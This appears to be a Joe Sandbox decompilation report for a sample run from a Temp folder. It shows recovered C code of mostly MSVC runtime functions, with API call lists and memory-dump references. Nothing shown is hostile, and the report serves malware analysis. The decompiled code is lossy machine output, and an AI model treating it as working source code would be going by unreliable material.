    							_t40 = _t56 + _t16;
    							__eflags = _t40 - 0x400;
    							if(_t40 > 0x400) {
    								_t41 = E00F677DC(_t54, _t56, MultiByteToWideChar, _t40);
    								__eflags = _t41 - _t47;
    								if(_t41 != _t47) {
    									 *_t41 = 0xdddd;
    									goto L11;
    								}
    							} else {
    								E00F67870(_t40);
    								_t41 = _t62;
    								__eflags = _t41 - _t47;
    								if(_t41 != _t47) {
    									 *_t41 = 0xcccc;
    									L11:
    									_t41 =  &(_t41[4]);
    									__eflags = _t41;
    								}
    							}
    							_t47 = _t41;
    						}
    					}
    					__eflags = _t47;
    					if(_t47 == 0) {
    						goto L3;
    					} else {
    						E00F65BA0(_t47, 0, _t56 + _t56);
    						_t37 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t47, _t56);
    						__eflags = _t37;
    						if(_t37 != 0) {
    							_v12 = GetStringTypeW(_a8, _t47, _t37, _a20);
    						}
    						E00F65C1A(_t47);
    						_t33 = _v12;
    					}
    				} else {
    					L3:
    					_t33 = 0;
    				}
    				_pop(_t57);
    				_pop(_t60);
    				_pop(_t48);
    				return E00F65F8E(_t33, _t48, _v8 ^ _t61, _t54, _t57, _t60);
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,?,?,?,?,00F65F7C,?,00000000,?), ref: 00F65EB1
    • __alloca_probe_16.NTDLLP ref: 00F65ED2
      • Part of subcall function 00F677DC: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00F66195,00000000,00000001,00000000,?,00F660A2,00000018,00F69EB8,0000000C,00F66132), ref: 00F67821
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00F65F1B
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00F65F29
    • __freea.LIBCMT ref: 00F65F33
      • Part of subcall function 00F65F8E: IsDebuggerPresent.KERNEL32 ref: 00F67957
      • Part of subcall function 00F65F8E: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F6796C
      • Part of subcall function 00F65F8E: UnhandledExceptionFilter.KERNEL32(00F698EC), ref: 00F67977
      • Part of subcall function 00F65F8E: GetCurrentProcess.KERNEL32(C0000409), ref: 00F67993
      • Part of subcall function 00F65F8E: TerminateProcess.KERNEL32(00000000), ref: 00F6799A
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 100%
    			E00F65AFF() {
    				struct _FILETIME _v12;
    				signed int _v16;
    				union _LARGE_INTEGER _v20;
    				signed int _t14;
    				signed int _t16;
    				signed int _t17;
    				signed int _t18;
    				signed int _t22;
    				signed int _t25;
    				signed int _t34;
    
    				_t14 =  *0xf6b940; // 0xbb40e64e
    				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
    				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
    				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
    					GetSystemTimeAsFileTime( &_v12);
    					_t16 = GetCurrentProcessId();
    					_t17 = GetCurrentThreadId();
    					_t18 = GetTickCount();
    					QueryPerformanceCounter( &_v20);
    					_t22 = _v16 ^ _v20.LowPart;
    					_t34 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
    					if(_t34 != 0xbb40e64e) {
    						if((0xffff0000 & _t34) == 0) {
    							_t22 = (_t34 | 0x00004711) << 0x10;
    							_t34 = _t34 | _t22;
    						}
    					} else {
    						_t34 = 0xbb40e64f;
    					}
    					 *0xf6b940 = _t34;
    					 *0xf6b944 =  !_t34;
    					return _t22;
    				} else {
    					_t25 =  !_t14;
    					 *0xf6b944 = _t25;
    					return _t25;
    				}
    			}

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F65B36
    • GetCurrentProcessId.KERNEL32 ref: 00F65B42
    • GetCurrentThreadId.KERNEL32 ref: 00F65B4A
    • GetTickCount.KERNEL32 ref: 00F65B52
    • QueryPerformanceCounter.KERNEL32(?), ref: 00F65B5E
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 95%
    			// MSVC CRT _wsetargv: records the module path (_wpgmptr), then runs _wparse_cmdline
    			// (E00F65405) twice over the command line, falling back to the module path when
    			// _wcmdln is empty: once to count arguments and characters, once to fill the block
    			// allocated by E00F66184 (_malloc_crt). CRT start-up code, not sample-specific logic.
    			E00F6555B() {
    				signed int _v8;
    				char _v12;
    				void* __ebx;
    				void* __ecx;
    				WCHAR* _t14;
    				signed int _t17;
    				signed int _t18;
    				signed int _t28;
    				char _t35;
    				WCHAR* _t42;
    				signed int _t47;

    				_push(_t31);
    				 *0xf6c868 = 0;
    				GetModuleFileNameW(0, 0xf6c660, 0x104); // MAX_PATH buffer for the module path
    				_t14 =  *0xf6ceb8; // 0x29176e (_wcmdln)
    				 *0xf6c024 = 0xf6c660; // _wpgmptr
    				if(_t14 == 0) {
    					L2:
    					_t42 = 0xf6c660;
    				} else {
    					_t42 = _t14;
    					if( *_t14 == 0) {
    						goto L2;
    					}
    				}
    				_t17 = E00F65405(_t42,  &_v12, 0, 0,  &_v8); // pass 1: _v8 = numargs, _v12 = numchars
    				_t28 = _v8;
    				if(_t28 >= 0x3fffffff) { // size-overflow guards on both counts
    					L8:
    					_t18 = _t17 | 0xffffffff;
    				} else {
    					_t35 = _v12;
    					if(_t35 >= 0x7fffffff) {
    						goto L8;
    					} else {
    						_t17 = _t35 + _t28 * 2 + _t35 + _t28 * 2; // numargs * sizeof(WCHAR*) + numchars * sizeof(WCHAR)
    						if(_t17 < _t35 + _t35) {
    							goto L8;
    						} else {
    							_t17 = E00F66184(_t17); // _malloc_crt
    							_t47 = _t17;
    							if(_t47 == 0) {
    								goto L8;
    							} else {
    								E00F65405(_t42,  &_v12, _t47 + _t28 * 4, _t47,  &_v8); // pass 2: pointer table first, strings behind it
    								 *0xf6c004 = _v8 - 1; // __argc (numargs includes the terminating NULL pointer)
    								 *0xf6c00c = _t47; // __wargv
    								_t18 = 0;
    							}
    						}
    					}
    				}
    				return _t18;
    			}

    Instruction addresses (per-line address column collapsed): 0x00f65561 to 0x00f65608

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp,00000104), ref: 00F6557B
    • _wparse_cmdline.LIBCMT ref: 00F655A5
      • Part of subcall function 00F66184: Sleep.KERNEL32(00000000,00000001,00000000,?,00F660A2,00000018,00F69EB8,0000000C,00F66132,00000000,?,?,00F64660,0000000D), ref: 00F661A5
    • _wparse_cmdline.LIBCMT ref: 00F655E7
    Memory Dump Source
    • Source File: 00000005.00000002.1689369576.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000002.1689363080.00F60000.00000002.sdmp
    • Associated: 00000005.00000002.1689377239.00F68000.00000002.sdmp
    • Associated: 00000005.00000002.1689384429.00F6B000.00000004.sdmp
    • Associated: 00000005.00000002.1689391890.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_f60000_F915.jbxd
    C-Code - Quality: 68%
    			// Duplicates a UNICODE_STRING (x86 layout: Length at +0, Buffer at +4, which the
    			// decompiler shows as __esi[2] in shorts) into a fresh LocalAlloc(LPTR = 0x40, Length + 2)
    			// block, so the copy is zero-terminated; E00F668B0(dest, src, n) copies Length bytes.
    			// LocalAlloc is resolved at run time via GetProcAddress(GetModuleHandleW(L"kernel32"),
    			// "LocalAlloc") instead of the import table, the same pattern as E00F61FA9 below.
    			E00F63168(signed short* __esi) {
    				void* _t10;

    				_t10 = 0;
    				if(__esi != 0) {
    					_push(( *__esi & 0x0000ffff) + 2); // Length + 2 bytes
    					_push(0x40); // LPTR = LMEM_FIXED | LMEM_ZEROINIT
    					_t10 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
    					if(_t10 != 0) {
    						E00F668B0(_t10, __esi[2],  *__esi & 0x0000ffff); // copy Buffer, Length bytes
    					}
    				}
    				return _t10;
    			}

    Instruction addresses (per-line address column collapsed): 0x00f63169 to 0x00f631aa

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000002,00F69BE0,00F6323C), ref: 00F63182
    • GetProcAddress.KERNEL32(00000000), ref: 00F63189
    Strings
    • kernel32 (GetModuleHandleW argument in the C-Code above)
    • LocalAlloc (GetProcAddress argument in the C-Code above)
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 50%
    			// Widens an 8-bit string (__edi, __esi bytes long) into a fresh LocalAlloc(LPTR, 2 * len + 2)
    			// block, each byte into its own 16-bit slot; LocalAlloc is resolved at run time via
    			// GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc") rather than imported. The
    			// decompiler dropped the register holding the LocalAlloc result (its output read
    			// "if(0 != 0)" and "0 + _t10 * 2"); that register is _t6, as in the sibling E00F63168.
    			E00F61FA9(void* __edi, void* __esi) {
    				signed int _t6;
    				signed int _t10;
    				void* _t13;

    				_t13 = __esi;
    				_t6 = 0;
    				if(__edi != 0 && __esi != 0) {
    					_t2 = _t13 + 2; // 0x100000013
    					_push(__esi + _t2); // byte count: len + len + 2
    					_push(0x40); // LPTR = LMEM_FIXED | LMEM_ZEROINIT
    					_t6 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
    					if(_t6 != 0) {
    						_t10 = 0;
    						if(__esi != 0) {
    							do {
    								 *((short*)(_t6 + _t10 * 2)) =  *((char*)(_t10 + __edi)); // one byte per 16-bit slot
    								_t10 = _t10 + 1;
    							} while (_t10 < __esi);
    						}
    					}
    				}
    				return _t6;
    			}

    Instruction addresses (per-line address column collapsed): 0x00f61fa9 to 0x00f61feb

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,0000000100000013,00F61ABB), ref: 00F61FC4
    • GetProcAddress.KERNEL32(00000000), ref: 00F61FCB
    Strings
    • kernel32 (GetModuleHandleW argument in the C-Code above)
    • LocalAlloc (GetProcAddress argument in the C-Code above)
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 100%
    			// MSVC CRT __crtCorExitProcess: if the CLR (mscoree.dll) is already loaded, exit through
    			// CorExitProcess so managed shutdown runs; the CRT exit path then continues to ExitProcess.
    			E00F64CE6(intOrPtr _a4) {
    				struct HINSTANCE__* _t2;
    
    				_t2 = GetModuleHandleW(L"mscoree.dll");
    				if(_t2 != 0) {
    					_t2 = GetProcAddress(_t2, "CorExitProcess");
    					if(_t2 != 0) {
    						return _t2->i(_a4);
    					}
    				}
    				return _t2;
    			}

    Instruction addresses (per-line address column collapsed): 0x00f64cf0 to 0x00f64d10

    APIs
    • GetModuleHandleW.KERNEL32(mscoree.dll,?,00F64D1E,00000000,?,00F6780B,000000FF,0000001E,00000001,00000000,00000000,?,00F66195,00000000,00000001,00000000), ref: 00F64CF0
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00F64D1E,00000000,?,00F6780B,000000FF,0000001E,00000001,00000000,00000000,?,00F66195,00000000,00000001), ref: 00F64D00
    Strings
    • mscoree.dll (GetModuleHandleW argument in the C-Code above)
    • CorExitProcess (GetProcAddress argument in the C-Code above)
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 91%
    			// MSVC CRT _setmbcp_nolock: validates the requested code page (IsValidCodePage, GetCPInfo;
    			// 0xfde8/0xfde9 are CP_UTF7/CP_UTF8 and are rejected) and fills the multibyte ctype table
    			// of the _mbcinfo block at _a8. Locale start-up code, not sample-specific logic. The
    			// IsDebuggerPresent/SetUnhandledExceptionFilter/TerminateProcess(0xC0000409) chain listed
    			// under E00F65F8E in the APIs below is the CRT's __report_gsfailure (stack-cookie failure
    			// handler, STATUS_STACK_BUFFER_OVERRUN), not an anti-debugging check.
    			E00F63EB9(void* __ecx, void* __edx, void* __eflags, int _a4, int _a8) {
    				signed int _v8;
    				char _v21;
    				char _v22;
    				struct _cpinfo _v28;
    				signed int _v32;
    				int _v36;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t53;
    				int _t56;
    				signed char _t59;
    				int _t61;
    				short* _t62;
    				signed int _t66;
    				signed char* _t78;
    				signed int _t81;
    				int _t82;
    				signed int _t85;
    				intOrPtr* _t86;
    				int _t91;
    				signed char _t92;
    				signed int _t93;
    				int _t95;
    				int _t97;
    				signed int _t98;
    				signed int _t101;
    				intOrPtr* _t104;
    				signed int _t105;
    
    				_t53 =  *0xf6b940; // 0xbb40e64e
    				_v8 = _t53 ^ _t105;
    				_t82 = _a8;
    				_t97 = E00F63E3D(_a4);
    				_t100 = 0;
    				_a4 = _t97;
    				if(_t97 != 0) {
    					_v32 = 0;
    					_t56 = 0;
    					__eflags = 0;
    					while(1) {
    						__eflags =  *((intOrPtr*)(_t56 + 0xf6b438)) - _t97;
    						if( *((intOrPtr*)(_t56 + 0xf6b438)) == _t97) {
    							break;
    						}
    						_v32 = _v32 + 1;
    						_t56 = _t56 + 0x30;
    						__eflags = _t56 - 0xf0;
    						if(_t56 < 0xf0) {
    							continue;
    						} else {
    							__eflags = _t97 - 0xfde8;
    							if(_t97 == 0xfde8) {
    								L35:
    								_t64 = _t56 | 0xffffffff;
    								__eflags = _t56 | 0xffffffff;
    							} else {
    								__eflags = _t97 - 0xfde9;
    								if(_t97 == 0xfde9) {
    									goto L35;
    								} else {
    									_t56 = IsValidCodePage(_t97 & 0x0000ffff);
    									__eflags = _t56;
    									if(_t56 == 0) {
    										goto L35;
    									} else {
    										_t56 = GetCPInfo(_t97,  &_v28);
    										__eflags = _t56;
    										if(_t56 == 0) {
    											__eflags =  *0xf6bfcc - _t100; // 0x0
    											if(__eflags != 0) {
    												goto L1;
    											} else {
    												goto L35;
    											}
    										} else {
    											E00F65BA0(_t82 + 0x1c, _t100, 0x101);
    											_t95 = 1;
    											 *(_t82 + 4) = _t97;
    											 *(_t82 + 0xc) = _t100;
    											__eflags = _v28 - 1;
    											if(_v28 <= 1) {
    												 *(_t82 + 8) = _t100;
    											} else {
    												__eflags = _v22;
    												if(_v22 != 0) {
    													_t104 =  &_v21;
    													while(1) {
    														_t92 =  *_t104;
    														__eflags = _t92;
    														if(_t92 == 0) {
    															goto L29;
    														}
    														_t81 =  *(_t104 - 1) & 0x000000ff;
    														_t93 = _t92 & 0x000000ff;
    														while(1) {
    															__eflags = _t81 - _t93;
    															if(_t81 > _t93) {
    																break;
    															}
    															 *(_t82 + _t81 + 0x1d) =  *(_t82 + _t81 + 0x1d) | 0x00000004;
    															_t81 = _t81 + 1;
    															__eflags = _t81;
    														}
    														_t104 = _t104 + 2;
    														__eflags =  *(_t104 - 1);
    														if( *(_t104 - 1) != 0) {
    															continue;
    														}
    														goto L29;
    													}
    												}
    												L29:
    												_t78 = _t82 + 0x1e;
    												_t91 = 0xfe;
    												do {
    													 *_t78 =  *_t78 | 0x00000008;
    													_t78 =  &(_t78[1]);
    													_t91 = _t91 - 1;
    													__eflags = _t91;
    												} while (_t91 != 0);
    												 *(_t82 + 0xc) = E00F63B76( *(_t82 + 4));
    												 *(_t82 + 8) = _t95;
    											}
    											_t97 = _t82 + 0x10;
    											asm("stosd");
    											asm("stosd");
    											asm("stosd");
    											L25:
    											_t100 = _t82;
    											E00F63C09(_t82);
    											goto L2;
    										}
    									}
    								}
    							}
    						}
    						goto L36;
    					}
    					E00F65BA0(_t82 + 0x1c, _t100, 0x101);
    					_t85 = _v32 * 0x30;
    					_v36 = _t100;
    					_t101 = _t85 + 0xf6b448;
    					_v32 = _t101;
    					while(1) {
    						L21:
    						__eflags =  *_t101;
    						if( *_t101 == 0) {
    							break;
    						}
    						_t59 =  *(_t101 + 1);
    						__eflags = _t59;
    						if(_t59 != 0) {
    							_t98 =  *_t101 & 0x000000ff;
    							_t66 = _t59 & 0x000000ff;
    							while(1) {
    								__eflags = _t98 - _t66;
    								if(_t98 > _t66) {
    									break;
    								}
    								 *(_t82 + _t98 + 0x1d) =  *(_t82 + _t98 + 0x1d) |  *(_v36 + 0xf6b434);
    								_t66 =  *(_t101 + 1) & 0x000000ff;
    								_t98 = _t98 + 1;
    								__eflags = _t98;
    							}
    							_t97 = _a4;
    							_t101 = _t101 + 2;
    							__eflags = _t101;
    							continue;
    						}
    						break;
    					}
    					_v36 = _v36 + 1;
    					_t101 = _v32 + 8;
    					__eflags = _v36 - 4;
    					_v32 = _t101;
    					if(_v36 < 4) {
    						goto L21;
    					}
    					 *(_t82 + 4) = _t97;
    					 *(_t82 + 8) = 1;
    					_t61 = E00F63B76(_t97);
    					 *(_t82 + 0xc) = _t61;
    					_t62 = _t82 + 0x10;
    					_t86 = _t85 + 0xf6b43c;
    					_t95 = 6;
    					do {
    						 *_t62 =  *_t86;
    						_t86 = _t86 + 2;
    						_t62 = _t62 + 2;
    						_t95 = _t95 - 1;
    						__eflags = _t95;
    					} while (_t95 != 0);
    					goto L25;
    				} else {
    					L1:
    					E00F63BA5(_t82);
    					L2:
    					_t64 = 0;
    				}
    				L36:
    				return E00F65F8E(_t64, _t82, _v8 ^ _t105, _t95, _t97, _t100);
    			}

    Instruction addresses (per-line address column collapsed): 0x00f63ec1 to 0x00f640a1

    APIs
      • Part of subcall function 00F63E3D: GetOEMCP.KERNEL32 ref: 00F63E66
      • Part of subcall function 00F63E3D: GetACP.KERNEL32 ref: 00F63E89
    • IsValidCodePage.KERNEL32(-00000030), ref: 00F63F2C
    • GetCPInfo.KERNEL32(00000000,?), ref: 00F63F3F
    • setSBUpLow.LIBCMT ref: 00F6402D
      • Part of subcall function 00F63C09: GetCPInfo.KERNEL32(?,?), ref: 00F63C2A
      • Part of subcall function 00F63C09: ___crtGetStringTypeA.LIBCMT ref: 00F63CA7
      • Part of subcall function 00F63C09: ___crtLCMapStringA.LIBCMT ref: 00F63CC7
      • Part of subcall function 00F63C09: ___crtLCMapStringA.LIBCMT ref: 00F63CEC
    • setSBCS.LIBCMT ref: 00F63EE6
      • Part of subcall function 00F65F8E: IsDebuggerPresent.KERNEL32 ref: 00F67957
      • Part of subcall function 00F65F8E: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F6796C
      • Part of subcall function 00F65F8E: UnhandledExceptionFilter.KERNEL32(00F698EC), ref: 00F67977
      • Part of subcall function 00F65F8E: GetCurrentProcess.KERNEL32(C0000409), ref: 00F67993
      • Part of subcall function 00F65F8E: TerminateProcess.KERNEL32(00000000), ref: 00F6799A
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 58%
    			// MSVC CRT _mtterm with _mtdeletelocks inlined: releases the FLS slot (*0xf6b774; the
    			// DecodePointer call recovers the encoded FlsFree pointer) and the TLS slot (*0xf6b778),
    			// then deletes the CRT lock table at 0xf6b948..0xf6ba68. Shutdown code, not sample-specific.
    			E00F645D9() {
    				signed int _t3;
    				long _t4;
    				struct _CRITICAL_SECTION* _t5;
    				struct _CRITICAL_SECTION* _t14;
    				signed int* _t17;
    				struct _CRITICAL_SECTION** _t18;
    
    				_t3 =  *0xf6b774; // 0xffffffff
    				if(_t3 != 0xffffffff) {
    					__imp__DecodePointer( *0xf6bff4, _t3);
    					 *_t3();
    					 *0xf6b774 =  *0xf6b774 | 0xffffffff;
    				}
    				_t4 =  *0xf6b778; // 0xffffffff
    				if(_t4 != 0xffffffff) {
    					TlsFree(_t4);
    					 *0xf6b778 =  *0xf6b778 | 0xffffffff;
    				}
    				_t17 = 0xf6b948;
    				do {
    					_t14 =  *_t17;
    					if(_t14 != 0 && _t17[1] != 1) {
    						DeleteCriticalSection(_t14);
    						E00F6614A(_t14);
    						 *_t17 =  *_t17 & 0x00000000;
    					}
    					_t17 =  &(_t17[2]);
    				} while (_t17 < 0xf6ba68);
    				_t18 = 0xf6b948;
    				do {
    					_t5 =  *_t18;
    					if(_t5 != 0 && _t18[1] == 1) {
    						DeleteCriticalSection(_t5);
    					}
    					_t18 =  &(_t18[2]);
    				} while (_t18 < 0xf6ba68);
    				return _t5;
    			}

    Instruction addresses (per-line address column collapsed; the function is split in two chunks): 0x00f645d9 to 0x00f6460a and 0x00f65ff1 to 0x00f6603d

    APIs
    • DecodePointer.KERNEL32(FFFFFFFF,00F64A02,?,00F63A8B,00F69DC8,00000014), ref: 00F645EA
    • TlsFree.KERNEL32(FFFFFFFF,00F64A02,?,00F63A8B,00F69DC8,00000014), ref: 00F64604
    • DeleteCriticalSection.KERNEL32(00000000,00000000,0000A47E,?,00F64A02,?,00F63A8B,00F69DC8,00000014), ref: 00F66004
      • Part of subcall function 00F6614A: HeapFree.KERNEL32(00000000,00000000,?,00F64734,00000000,?,?,00F6474B,?,00F63785), ref: 00F66160
      • Part of subcall function 00F6614A: GetLastError.KERNEL32(00000000,?,00F64734,00000000,?,?,00F6474B,?,00F63785), ref: 00F66172
    • DeleteCriticalSection.KERNEL32(FFFFFFFF,0000A47E,?,00F64A02,?,00F63A8B,00F69DC8,00000014), ref: 00F6602E
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 81%
    			// MSVC CRT __updatetmbcinfo: under _MB_CP_LOCK (0xd) replaces the thread's ptmbcinfo
    			// (ptd + 0x68) with the global __ptmbcinfo, releasing the old block when its refcount
    			// drops to zero; _amsg_exit(0x20 = _RT_LOCALE) if no block results. Locale code, not
    			// sample-specific logic.
    			E00F63D99(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t15;
    				LONG* _t21;
    				void* _t31;
    				LONG* _t33;
    				void* _t34;
    				void* _t35;
    
    				_t35 = __eflags;
    				_t29 = __edx;
    				_t25 = __ebx;
    				_push(0xc);
    				_push(0xf69de8);
    				E00F65910(__ebx, __edi, __esi);
    				_t31 = E00F64743(__ebx, __edx, _t35);
    				_t15 =  *0xf6b528; // 0xfffffffe
    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
    					E00F66117(_t25, _t31, 0xd);
    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
    					_t33 =  *(_t31 + 0x68);
    					 *(_t34 - 0x1c) = _t33;
    					__eflags = _t33 -  *0xf6b430; // 0xf6b008
    					if(__eflags != 0) {
    						__eflags = _t33;
    						if(__eflags != 0) {
    							__eflags = InterlockedDecrement(_t33);
    							if(__eflags == 0) {
    								__eflags = _t33 - 0xf6b008;
    								if(__eflags != 0) {
    									E00F6614A(_t33);
    								}
    							}
    						}
    						_t21 =  *0xf6b430; // 0xf6b008
    						 *(_t31 + 0x68) = _t21;
    						_t33 =  *0xf6b430; // 0xf6b008
    						 *(_t34 - 0x1c) = _t33;
    						InterlockedIncrement(_t33);
    					}
    					 *(_t34 - 4) = 0xfffffffe;
    					E00F63E34();
    				} else {
    					_t33 =  *(_t31 + 0x68);
    				}
    				_t38 = _t33;
    				if(_t33 == 0) {
    					_push(0x20);
    					E00F64FB3(_t29, _t38);
    				}
    				return E00F65955(_t33);
    			}

    Instruction addresses (per-line address column collapsed): 0x00f63d99 to 0x00f63e2a

    APIs
    • __getptd.LIBCMT ref: 00F63DA5
      • Part of subcall function 00F64743: __amsg_exit.LIBCMT ref: 00F64753
    • __amsg_exit.LIBCMT ref: 00F63DC5
      • Part of subcall function 00F66117: __amsg_exit.LIBCMT ref: 00F66139
      • Part of subcall function 00F66117: EnterCriticalSection.KERNEL32(?,?,?,00F64660,0000000D), ref: 00F66141
    • InterlockedDecrement.KERNEL32(?,00F69DE8,0000000C,00F637CD), ref: 00F63DF2
      • Part of subcall function 00F6614A: HeapFree.KERNEL32(00000000,00000000,?,00F64734,00000000,?,?,00F6474B,?,00F63785), ref: 00F66160
      • Part of subcall function 00F6614A: GetLastError.KERNEL32(00000000,?,00F64734,00000000,?,?,00F6474B,?,00F63785), ref: 00F66172
    • InterlockedIncrement.KERNEL32(00F6B008,00F69DE8,0000000C,00F637CD), ref: 00F63E1D
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 58%
    			// MSVC CRT _getptd_noexit: fetches the thread's _tiddata from FLS (E00F645A5) and, on first
    			// use, allocates a 0x214-byte block, stores it, and initialises it via E00F64616 (_initptd).
    			// GetLastError is saved and restored around the work. Not sample-specific logic.
    			E00F646CA(void* __ebx) {
    				void* __edi;
    				void* __esi;
    				long _t3;
    				long* _t7;
    				void* _t8;
    				long _t11;
    				long _t18;
    				long* _t19;
    
    				_t3 = GetLastError();
    				_push( *0xf6b774);
    				_t18 = _t3;
    				_t19 =  *((intOrPtr*)(E00F645A5()))();
    				if(_t19 == 0) {
    					_t7 = E00F661C9(1, 0x214);
    					_t19 = _t7;
    					if(_t19 != 0) {
    						__imp__DecodePointer( *0xf6bff0,  *0xf6b774, _t19);
    						_t8 =  *_t7();
    						_t22 = _t8;
    						if(_t8 == 0) {
    							E00F6614A(_t19);
    							_t19 = 0;
    							__eflags = 0;
    						} else {
    							_push(0);
    							_push(_t19);
    							E00F64616(__ebx, _t18, _t19, _t22);
    							_t11 = GetCurrentThreadId();
    							_t19[1] = _t19[1] | 0xffffffff;
    							 *_t19 = _t11;
    						}
    					}
    				}
    				SetLastError(_t18);
    				return _t19;
    			}

    Instruction addresses (per-line address column collapsed): 0x00f646ce to 0x00f64742

    APIs
    • GetLastError.KERNEL32(?,?,00F6474B,?,00F63785), ref: 00F646CE
      • Part of subcall function 00F645A5: TlsGetValue.KERNEL32(?,00F646E1,?,?,00F6474B,?,00F63785), ref: 00F645AE
      • Part of subcall function 00F645A5: DecodePointer.KERNEL32(?,00F646E1,?,?,00F6474B,?,00F63785), ref: 00F645C0
